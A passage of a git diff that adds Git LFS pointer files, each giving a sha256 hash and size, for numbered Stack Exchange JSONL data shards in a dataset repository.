0000000000000000000000000000000000000000..c09efee7628a5c74e38608b4bb7aa53c4cea7ede --- /dev/null +++ b/data/stackexchange/1-1/457_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cb5bde2c73ad2434327efbc967a69914f72bdaada1b6cc144c9ef092115b11ce +size 40183886 diff --git a/data/stackexchange/1-1/458_2289.jsonl b/data/stackexchange/1-1/458_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5104f8a77e050be4f51dccc2ae43caba2dae388c --- /dev/null +++ b/data/stackexchange/1-1/458_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f59969d6c1f4bb60e78005f5524653bbc54a000bdc5524c09d07c3d8e68da127 +size 40027346 diff --git a/data/stackexchange/1-1/459_2289.jsonl b/data/stackexchange/1-1/459_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..95356b3b7c34754b6b6435f5a29a7a83238dd943 --- /dev/null +++ b/data/stackexchange/1-1/459_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6b5963fa308de353c523cfeefdd71f2e350a453382b2ccdd711050c1ff53763d +size 40332957 diff --git a/data/stackexchange/1-1/45_2289.jsonl b/data/stackexchange/1-1/45_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..053ad4ca3ab7382ea95898dac7802f194f807b23 --- /dev/null +++ b/data/stackexchange/1-1/45_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:07922e59893f39a24177476012ec15d49998df880039361461c6ac4416ed81e6 +size 35598572 diff --git a/data/stackexchange/1-1/460_2289.jsonl b/data/stackexchange/1-1/460_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d06400e45436b8eca95d1b67858db6b638159caa --- /dev/null +++ b/data/stackexchange/1-1/460_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5de1de9075e7b9cbaf3f7d14b147db0cb65f26f3633392490a36e7b3d0ecede2 +size 39987954 diff --git a/data/stackexchange/1-1/461_2289.jsonl b/data/stackexchange/1-1/461_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2e35010918acc847c25f6f0cb05f9c24d0d312a3 --- /dev/null +++ b/data/stackexchange/1-1/461_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:07eebb9ee7e02c040889442160cb36488358b2d2776087476e2332f53da5f3a5 +size 40623897 diff --git a/data/stackexchange/1-1/462_2289.jsonl b/data/stackexchange/1-1/462_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..c7cb51a166c9226006927a197e9c492e20349ae0 --- /dev/null +++ b/data/stackexchange/1-1/462_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a9e579aa5bc546a39deb082eec2efba0371006ab15ffc136aa7ece80f3fefb23 +size 40679270 diff --git a/data/stackexchange/1-1/463_2289.jsonl b/data/stackexchange/1-1/463_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1317f5b345a09349c57766ff9c93ec96af9cd645 --- /dev/null +++ b/data/stackexchange/1-1/463_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:aa31d1a2084087f8628547dc364a941a86c2c0637813aca6ebeb97174ebb27e1 +size 40462401 diff --git a/data/stackexchange/1-1/464_2289.jsonl b/data/stackexchange/1-1/464_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a4778238013bc39c64c3727d030ae9798a1212c6 --- /dev/null +++ b/data/stackexchange/1-1/464_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6d08d188ffac34a3676e0a94c2f32726bb2671ebca587b2df2be99f75fc55219 +size 40434077 diff --git a/data/stackexchange/1-1/465_2289.jsonl b/data/stackexchange/1-1/465_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d275787856d44b9e5a446db12e890e9c02d791d9 --- /dev/null +++ b/data/stackexchange/1-1/465_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e78ef2ea752d964486d580ccc4195caf6cf6078540c5c8d3cc3ff3c0c3a62713 +size 39840897 diff --git a/data/stackexchange/1-1/466_2289.jsonl b/data/stackexchange/1-1/466_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a363a1a27b7b27acec33083ea420628c3b0dc40d --- /dev/null +++ b/data/stackexchange/1-1/466_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:73bb25969e9d6974de42de04f38dd75adfc3dac3012bd392147f347a6f79bc8e +size 40850458 diff --git a/data/stackexchange/1-1/467_2289.jsonl b/data/stackexchange/1-1/467_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ba53dd7f6fd1d4204ed3eac5cadd3c88e583c905 --- /dev/null +++ b/data/stackexchange/1-1/467_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:17b1a23b701bd8fa83f91c841c2af1f274effb31bc6520d94cb7de6820f475d6 +size 40582748 diff --git a/data/stackexchange/1-1/468_2289.jsonl b/data/stackexchange/1-1/468_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5a8f70e6c40ba24eac271a0ae410dcaa040c3c6c --- /dev/null +++ b/data/stackexchange/1-1/468_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6362c3bf90c5d39d594684eb26c274be4717ad53ad28680c9cc53ef440d4a5fc +size 39993199 diff --git a/data/stackexchange/1-1/469_2289.jsonl b/data/stackexchange/1-1/469_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..17b95df4950d7c7a5b8ce8d2cd29edc5317627ab --- /dev/null +++ b/data/stackexchange/1-1/469_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f8291f97c8ed052c0ec42e493588c98169ec5d066461d7683c41ed19c78112f6 +size 40515045 diff --git a/data/stackexchange/1-1/46_2289.jsonl b/data/stackexchange/1-1/46_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b74c6e8effeed809f24bbe5d075d636e180042fb --- /dev/null +++ b/data/stackexchange/1-1/46_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:bf86a72f8f2c80a83103bd36785d8c5f3daeb61a5aa852370fd1463953a57b5d +size 35515619 diff --git a/data/stackexchange/1-1/470_2289.jsonl b/data/stackexchange/1-1/470_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1640c7afc1970461bccff5e1b383b294e2c61f15 --- /dev/null +++ b/data/stackexchange/1-1/470_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:25be264cb7902d131cd54bd44c4dd8bd1c5bcd217b371f63ceb6280619758e2b +size 40141723 diff --git a/data/stackexchange/1-1/471_2289.jsonl b/data/stackexchange/1-1/471_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..df911b85d8b881bf1dee4fb088d4419a62e96854 --- /dev/null +++ b/data/stackexchange/1-1/471_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ead7695108cecf120a5176d1565322812c040ce9d423991e181f4f9a6b9e3241 +size 40343744 diff --git a/data/stackexchange/1-1/472_2289.jsonl b/data/stackexchange/1-1/472_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..51dc1e2723f4b3816e6ec3f52132f00fde323db1 --- /dev/null +++ b/data/stackexchange/1-1/472_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fefbd3247d252822296ef2dbd2b815390ded3923f9b41efbc7c0f3ca93d25a90 +size 40812072 diff --git a/data/stackexchange/1-1/473_2289.jsonl b/data/stackexchange/1-1/473_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c0a2e118e0ccc6c65afde999d9131ec8688f4ab9 --- /dev/null +++ b/data/stackexchange/1-1/473_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f67e61a5171b840cd4c28913ac1ca14715b9d57e18b09c0ff4d473fd367b4eb9 +size 39476615 diff --git a/data/stackexchange/1-1/474_2289.jsonl b/data/stackexchange/1-1/474_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ba1c2049411e9dd4ed06451fadb420957b72aad8 --- /dev/null +++ b/data/stackexchange/1-1/474_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0045a6ace2095c3320c25b2829e93f2b51345039ca1267deedefd9cf2ea23adf +size 40040550 diff --git a/data/stackexchange/1-1/475_2289.jsonl b/data/stackexchange/1-1/475_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9c8e74a284b8509fee3606f84e3dcac07a961997 --- /dev/null +++ b/data/stackexchange/1-1/475_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b5663c2dd7f5fe3016fa2a5d6640436c8f448a6303160dc87b468a02a991bde2 +size 40066313 diff --git a/data/stackexchange/1-1/476_2289.jsonl b/data/stackexchange/1-1/476_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..dc0b5d0127f57a435b26fc1964b092da9d736429 --- /dev/null +++ b/data/stackexchange/1-1/476_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:02706830b12f2a9f618c05ea1c061faf392fa9f548e7d8d3fa2e35dec10d6b6f +size 39873305 diff --git a/data/stackexchange/1-1/477_2289.jsonl b/data/stackexchange/1-1/477_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8b03c756aeecc9d50e2e456ad7057512a3d68b57 --- /dev/null +++ b/data/stackexchange/1-1/477_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:928deede8a5b811fcef1a48a04de5e9219f8192f506d321fed6149ad9741ecb8 +size 39958624 diff --git a/data/stackexchange/1-1/478_2289.jsonl b/data/stackexchange/1-1/478_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..64277a806f476268292541320366ffba1b0c9e07 --- /dev/null +++ b/data/stackexchange/1-1/478_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:685ccf128a36a09dee5b14522e89885f0333afb9be2a1b56b6d322bb7d6df036 +size 40383453 diff --git a/data/stackexchange/1-1/479_2289.jsonl b/data/stackexchange/1-1/479_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..125c0ba3d864c6ce44604749e4991d425732d2c7 --- /dev/null +++ b/data/stackexchange/1-1/479_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4d6b8b08dc5480d3ebd27a99b4e33b496362f57c66c87900e0dcf5966af2cbd9 +size 40337027 diff --git a/data/stackexchange/1-1/47_2289.jsonl b/data/stackexchange/1-1/47_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..93935ed8e06f4aa7c08bafe3222c4f73c3c1d709 --- /dev/null +++ b/data/stackexchange/1-1/47_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2933d43fcb3d6234be93d75469669af029bddd680280066a15ed987e6363c262 +size 36318416 diff --git a/data/stackexchange/1-1/480_2289.jsonl b/data/stackexchange/1-1/480_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2049a0473c975e8eb829101b9ad0178c3332109f --- /dev/null +++ b/data/stackexchange/1-1/480_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3473c4d4da6737e58500df5ffa32cef7a030810bf7716b0d125ae37edee44f49 +size 40156351 diff --git a/data/stackexchange/1-1/481_2289.jsonl b/data/stackexchange/1-1/481_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ea833ab258be7c19cc5042f9fba799536366f7c2 --- /dev/null +++ b/data/stackexchange/1-1/481_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cc7543fed464dc84bb0a654c474cda75c0af6534e5316ccbf028e06b06169bee +size 40081801 diff --git a/data/stackexchange/1-1/482_2289.jsonl b/data/stackexchange/1-1/482_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0991429b816ec0e760357f61cd50ae0888002a37 --- /dev/null +++ b/data/stackexchange/1-1/482_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6eb203f69ee3c07248e82a9de0b1211fef99eedcbf847c28cb004b6dbc718b47 +size 40326619 diff --git a/data/stackexchange/1-1/483_2289.jsonl b/data/stackexchange/1-1/483_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f19a7493da193717cf5664bcaef0a93719fcdf2f --- /dev/null +++ b/data/stackexchange/1-1/483_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c9ce488a0796c2fe6fba9d916351f1deedc274eeb99f9ecc304da6cb854e24fd +size 39371395 diff --git a/data/stackexchange/1-1/484_2289.jsonl b/data/stackexchange/1-1/484_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2378ec7ba39b4eef9bf7cbccc12912cd0ef6bb61 --- /dev/null +++ b/data/stackexchange/1-1/484_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0a62884e66f8522eb050ce1964fc53002f7d7228caa4abd0f14fc99cea5e483a +size 40144673 diff --git a/data/stackexchange/1-1/485_2289.jsonl b/data/stackexchange/1-1/485_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..aa69c055b27600e10cf545b10b827af5f3833336 --- /dev/null +++ b/data/stackexchange/1-1/485_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:da31f5d24bbec266654fb0edba822b0cf0d6b786fe0fef259fa14ab14bafe14a +size 40611567 diff --git a/data/stackexchange/1-1/486_2289.jsonl b/data/stackexchange/1-1/486_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..26af1848c4ca800288713b8eeae5b18e9d000baf --- /dev/null +++ b/data/stackexchange/1-1/486_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b709e5dcbcf80245f999e45677ccaff82b4dc054dfa2fdbc421f7bd34749572b +size 39909267 diff --git a/data/stackexchange/1-1/487_2289.jsonl b/data/stackexchange/1-1/487_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d2273f3730276039870a9a9f4b52d2e25f6f5066 --- /dev/null +++ b/data/stackexchange/1-1/487_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1b5782d521862e785c63164ff1e0b6f09cbc8514d40f21f3b38beb137cf7a5c2 +size 40668655 diff --git a/data/stackexchange/1-1/488_2289.jsonl b/data/stackexchange/1-1/488_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..11becc0f5c656573f26f747fa166ec043ea85622 --- /dev/null +++ b/data/stackexchange/1-1/488_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b8f5b02058e0a1d64178afe43f0e8474cc3f7f7bfc4b97066dc8230bfbd9e53d +size 40129570 diff --git a/data/stackexchange/1-1/489_2289.jsonl b/data/stackexchange/1-1/489_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..646933c53056a539401aceaad53a96d4486e6100 --- /dev/null +++ b/data/stackexchange/1-1/489_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:33471ac2ef8af01fb19b137dcceafb2d59c6b80dbc221ad2fc3ce1bca28dc0c0 +size 40236945 diff --git a/data/stackexchange/1-1/48_2289.jsonl b/data/stackexchange/1-1/48_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4fb1366804649e9963d7c0bbd2a5e32767b292c3 --- /dev/null +++ b/data/stackexchange/1-1/48_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:84bc2ecc2e4e881910ad7781e3d4c2d011e58239afce6e53fd6e205872502ee8 +size 36061605 diff --git a/data/stackexchange/1-1/490_2289.jsonl b/data/stackexchange/1-1/490_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..76ae3d5543aeec5b2e9fdfd63f73b67607076012 --- /dev/null +++ b/data/stackexchange/1-1/490_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8fea52bf57bec645eb2348fe71aef42c4350cafdd87b32cdeb495910e347fb82 +size 40031396 diff --git a/data/stackexchange/1-1/491_2289.jsonl b/data/stackexchange/1-1/491_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..70d1d20226f7f2870a2453b6d73b1f95277991d4 --- /dev/null +++ b/data/stackexchange/1-1/491_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4b7ac41f98c76f77e92011072040f9c422612a0d34417e5233853ca4e845f2af +size 40125168 diff --git a/data/stackexchange/1-1/492_2289.jsonl b/data/stackexchange/1-1/492_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8287fa8df1bdd7970845db41f4a01ddcfcdae1f8 --- /dev/null +++ b/data/stackexchange/1-1/492_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4777c2fedbcf0d23210eea5b4e1c2bf4830ff0d9040531a39b2b63ea0abc1479 +size 39882293 diff --git a/data/stackexchange/1-1/493_2289.jsonl b/data/stackexchange/1-1/493_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..8ac63018dd350b07524edba696369f6a81ad1b71 --- /dev/null +++ b/data/stackexchange/1-1/493_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f00777a805823e4ac94ea1ec586c024f2c144c8015626f68855f65a9bc4685a6 +size 40032856 diff --git a/data/stackexchange/1-1/494_2289.jsonl b/data/stackexchange/1-1/494_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b271dbc0dd606d7243a3e2189555965a01c0e1d5 --- /dev/null +++ b/data/stackexchange/1-1/494_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:008b559795d1ae9853cb50065c29fead8c8e67465592d4736c27bfc3dd0029e7 +size 40164139 diff --git a/data/stackexchange/1-1/495_2289.jsonl b/data/stackexchange/1-1/495_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3fe71d16af67500d99a29bbd0dd23a6eebe68502 --- /dev/null +++ b/data/stackexchange/1-1/495_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:eae7e688b598ce7c6a17cee2d73accf350eb5bcbdcc7e2905ff079124ca3d571 +size 40123862 diff --git a/data/stackexchange/1-1/496_2289.jsonl b/data/stackexchange/1-1/496_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a7361b62e248890fa500ec65162aece1a8f92954 --- /dev/null +++ b/data/stackexchange/1-1/496_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7b306c70d5c493bde93310089c9d4a8296420ae22892c021dbfd3a957ee7e364 +size 40332549 diff --git a/data/stackexchange/1-1/497_2289.jsonl b/data/stackexchange/1-1/497_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9202e074f2bbe2ea7e710786306dff0c9fb04659 --- /dev/null +++ b/data/stackexchange/1-1/497_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:73429871bd66452a562d7a5f40c76986f533a97d9ff7c30646972805ecd44976 +size 41319420 diff --git a/data/stackexchange/1-1/498_2289.jsonl b/data/stackexchange/1-1/498_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..64b053f0fd87866d6cf6cba12b5f348e7f135c63 --- /dev/null +++ b/data/stackexchange/1-1/498_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fab0f2f8d068b1509f9f07e1436f64f4ec394334838178a9d041c1692e5096eb +size 40246076 diff --git a/data/stackexchange/1-1/499_2289.jsonl b/data/stackexchange/1-1/499_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f4a6f624faa1c53f95eab9a443fb8ff76d52d984 --- /dev/null +++ b/data/stackexchange/1-1/499_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9cc24a24af2a8a699ffa85763df82a540cbfbc60e2bae6c2a344d153e738d586 +size 40653063 diff --git a/data/stackexchange/1-1/49_2289.jsonl b/data/stackexchange/1-1/49_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b787e4247e45738167dde3e9b34e27c6a3c905d8 --- /dev/null +++ b/data/stackexchange/1-1/49_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:86473da24c1ee92c249c505ab114edbfe1277bce13b6c03af26746cea595e823 +size 35965884 diff --git a/data/stackexchange/1-1/4_2289.jsonl b/data/stackexchange/1-1/4_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3e8601cefaafae8046c038ffef23045af8db29e9 --- /dev/null +++ b/data/stackexchange/1-1/4_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:53d4c157452ab2b91e1fe48b6a21fafa0317f21f08f7aefb52db7377e9c88d2e +size 36591431 diff --git a/data/stackexchange/1-1/500_2289.jsonl b/data/stackexchange/1-1/500_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..77d2a7273443f43d31defdef318a13205e6d877b --- /dev/null +++ b/data/stackexchange/1-1/500_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f8f721075fea8a63fc8b3628aba65f148744c0688e34452f38fc125b4db6e1da +size 34919274 diff --git a/data/stackexchange/1-1/501_2289.jsonl b/data/stackexchange/1-1/501_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5c2e3771cdde5784a68a160b5b1357a898b13664 --- /dev/null +++ b/data/stackexchange/1-1/501_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1f1ce08772395bf03479fa44bcbaca11b3a8d0df569c88b30c91706615f987ca +size 36044376 diff --git a/data/stackexchange/1-1/502_2289.jsonl b/data/stackexchange/1-1/502_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..425e9b68d20ce3e55b106c69555e440d7d74f547 --- /dev/null +++ b/data/stackexchange/1-1/502_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6938e523f1fd009bc34910a1e803aab96fe01781f9fa6bb8abf50fa084c1d86d +size 35189990 diff --git a/data/stackexchange/1-1/503_2289.jsonl b/data/stackexchange/1-1/503_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4ac91245f8ea877984c17a6bf77f41c2c774c221 --- /dev/null +++ b/data/stackexchange/1-1/503_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9f59d9edc39744ffe72a290250bc9373cbf207a5ab32dbb1ef82c3fec1535059 +size 35767702 diff --git a/data/stackexchange/1-1/504_2289.jsonl b/data/stackexchange/1-1/504_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d370fd8ee4e58035a681f6083b782149822fa41b --- /dev/null +++ b/data/stackexchange/1-1/504_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f975bdcded30e57bdc6b75ec52653f2eb09aea5c1cbf680c85e10ca34e59735c +size 35041467 diff --git a/data/stackexchange/1-1/505_2289.jsonl b/data/stackexchange/1-1/505_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9aca37b1e0e259585912da051bca97e3e1ad1068 --- /dev/null +++ b/data/stackexchange/1-1/505_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a959072d44fc2f4d2a3ee45dbc1f18be607521e527d487ce5f871d18d7f78b48 +size 35292292 diff --git a/data/stackexchange/1-1/506_2289.jsonl b/data/stackexchange/1-1/506_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1e2f55af9db8a610bec855574e21ec8421608549 --- /dev/null +++ b/data/stackexchange/1-1/506_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cdef4ad1f446aa53944759da4f8acc9dcb537f8578825c4de0f913821b07188a +size 35666248 diff --git a/data/stackexchange/1-1/507_2289.jsonl b/data/stackexchange/1-1/507_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..375ee9c9d8712956dcda58c8979e9ce4c28eb793 --- /dev/null +++ b/data/stackexchange/1-1/507_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:de2365b77d9599b04d82c7f05d303529eaafa2abab5a411bb823189fbfe2294e +size 35432424 diff --git a/data/stackexchange/1-1/508_2289.jsonl b/data/stackexchange/1-1/508_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..ad9d0653921286c70c94e1fff9ef0c41012e5b25 --- /dev/null +++ b/data/stackexchange/1-1/508_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5226be7dbc41cb3aaa4abdf2d50c6085e3c88e91e87d138e30cec4df90ee01c8 +size 35166700 diff --git a/data/stackexchange/1-1/509_2289.jsonl b/data/stackexchange/1-1/509_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a1b283d7bbeeee0f059d7e8da20333b065047296 --- /dev/null +++ b/data/stackexchange/1-1/509_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1a0b0c704795f37e8e36337dbb612a75e30dfccf1b9ceb9276dc4d26aaf30f67 +size 35307252 diff --git a/data/stackexchange/1-1/50_2289.jsonl b/data/stackexchange/1-1/50_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1c97e189e8b3df0368fd9c74ed53747f3ffc31ad --- /dev/null +++ b/data/stackexchange/1-1/50_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:efcc7037524b3134bd456b673948adec62f468917a1084b946377c865d288a87 +size 40222373 diff --git a/data/stackexchange/1-1/510_2289.jsonl b/data/stackexchange/1-1/510_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d23d069c8cd74d54b7dc7a817b3917fd1b145744 --- /dev/null +++ b/data/stackexchange/1-1/510_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ec787e120181d933ef9cd67b344605a91b0ee5e5176e7cc907929580a0b962da +size 35148813 diff --git a/data/stackexchange/1-1/511_2289.jsonl b/data/stackexchange/1-1/511_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0f687e9e83be6fb8294a05f95104a1c55a29a08c --- /dev/null +++ b/data/stackexchange/1-1/511_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:23474f77613bed86e6b9880ab0ab25fe1e7f8bba19eea7c766c6ba5dae8f2265 +size 35369363 diff --git a/data/stackexchange/1-1/512_2289.jsonl b/data/stackexchange/1-1/512_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..25eef2536a74f3e2701763c9325dfe5131eeebb5 --- /dev/null +++ b/data/stackexchange/1-1/512_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:892f65eacb835bb78adbf446d3971cd75344ad8251b661180dcb21b87c0eeab5 +size 35308820 diff --git a/data/stackexchange/1-1/513_2289.jsonl b/data/stackexchange/1-1/513_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..32e780847065dbdde5362f41a3898128e3638d63 --- /dev/null +++ b/data/stackexchange/1-1/513_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c9e3134265f65ea9eeac85cea94842ea9bdc076544ce7535d18f1bc3d510c9e0 +size 35932062 diff --git a/data/stackexchange/1-1/514_2289.jsonl b/data/stackexchange/1-1/514_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5e617365fdf4dfe286f5f0ebc7229d301b8d9dc1 --- /dev/null +++ b/data/stackexchange/1-1/514_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9dad2d42592b2aa2056bff6cf1a91170975b6c66b6d59f61d4bf9fa53b885dc4 +size 35136292 diff --git a/data/stackexchange/1-1/515_2289.jsonl b/data/stackexchange/1-1/515_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c0ab9fd57b43c2b1c18e9791b88f1cd6da3b45f4 --- /dev/null +++ b/data/stackexchange/1-1/515_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
